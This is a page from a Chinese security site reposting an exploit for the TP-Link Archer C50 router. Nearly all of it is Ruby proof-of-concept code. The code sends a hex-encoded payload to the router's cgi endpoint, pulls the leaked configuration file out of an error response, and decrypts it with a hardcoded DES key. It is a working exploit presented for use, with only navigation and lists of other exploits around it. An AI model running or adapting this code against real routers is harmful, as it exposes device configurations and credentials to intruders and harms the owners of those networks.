首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configur 来源：vfocus.net 作者：Wadeek 发布时间：2018-11-14   # Exploit Title: TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure) # Date: 2018-11-07 # Exploit Author: Wadeek # Vendor Homepage: https://www.tp-link.com/ # Hardware Version: Archer C50 v3 00000001 # Firmware Link: https://www.tp-link.com/download/Archer-C50_V3.html#Firmware # Firmware Version: <= Build 171227   #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! url = "http://192.168.0.1:80/" #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!   require('base64') require('openssl') require('mechanize') agent = Mechanize.new() # require HTTP Proxy (chunk error) agent.set_proxy("127.0.0.1", "8080")   def scan(agent, url, path, query) begin     puts(path)     response = agent.post(url+path, query, {         "User-Agent" => "",         "Accept" => "*/*",         "Referer" => "http://192.168.0.1/mainFrame.htm",         "Content-Type" => "text/plain",         "Connection" => "keep-alive",         "Cookie" => ""     }) rescue Exception => e     begin     puts(e.inspect())     #     body = e.page().body()     content = Base64.decode64(body.scan(/ZAP Error \[java\.io\.IOException\]\: Bad chunk size\: (.*)/).join())     puts(body.inspect())     cipher = OpenSSL::Cipher.new("des-ecb")     cipher.key = "478DA50BF9E3D2CF"     cipher.decrypt()     output = cipher.update(content)     #     file = File.open("conf.bin.raw", "wb")     file.write(output)     file.close()     rescue Exception => e         puts(e)     end     puts("") end end   #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! payload = "\x5b\x49\x47\x44\x5f\x44\x45\x56\x5f\x49\x4e\x46\x4f\x23\x30"+ "\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x23\x30\x2c\x30\x2c"+ "\x30\x2c\x30\x2c\x30\x2c\x30\x5d\x30\x2c\x34\xd\xa\x6d\x6f\x64"+ "\x65\x6c\x4e\x61\x6d\x65\xd\xa\x64\x65\x73\x63\x72\x69\x70\x74"+ "\x69\x6f\x6e\xd\xa\x58\x5f\x54\x50\x5f\x69\x73\x46\x44\xd\xa\x58"+ "\x5f\x54\x50\x5f\x50\x72\x6f\x64\x75\x63\x74\x56\x65\x72\x73\x69"+ "\x6f\x6e\xd\xa\x5b\x45\x54\x48\x5f\x53\x57\x49\x54\x43\x48\x23\x30"+ "\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x23\x30\x2c\x30\x2c\x30\x2c"+ "\x30\x2c\x30\x2c\x30\x5d\x31\x2c\x31\xd\xa\x6e\x75\x6d\x62\x65\x72"+ "\x4f\x66\x56\x69\x72\x74\x75\x61\x6c\x50\x6f\x72\x74\x73\xd\xa\x5b"+ "\x53\x59\x53\x5f\x4d\x4f\x44\x45\x23\x30\x2c\x30\x2c\x30\x2c\x30\x2c"+ "\x30\x2c\x30\x23\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x5d\x32"+ "\x2c\x31\xd\xa\x6d\x6f\x64\x65\xd\xa\x5b\x2f\x63\x67\x69\x2f\x63\x6f"+ "\x6e\x66\x65\x6e\x63\x6f\x64\x65\x23\x30\x2c\x30\x2c\x30\x2c\x30"+ "\x2c\x30\x2c\x30\x23\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30"+ "\x5d\x33\x2c\x30\xd\xa\x3d" #puts(payload) scan(agent, url, "cgi?1&1&1&8", payload) #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·HeidiSQL 9.5.0.5196 - Denial o ·CuteFTP 9.3.0.3 - Denial of Se ·Microsoft Windows 10 (Build 17 ·Mongoose Web Server 6.9 - Deni ·VSAXESS V2.6.2.70 build2017122 ·CuteFTP Mac 3.1 - Denial of Se ·libiec61850 1.3 - Stack Based ·Evince 3.24.0 - Command Inject ·eToolz 3.4.8.0 - Denial of Ser ·XAMPP Control Panel 3.2.2 - Bu ·Arm Whois 3.11 - Buffer Overfl ·Cisco Immunet < 6.2.0 / Cisco   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved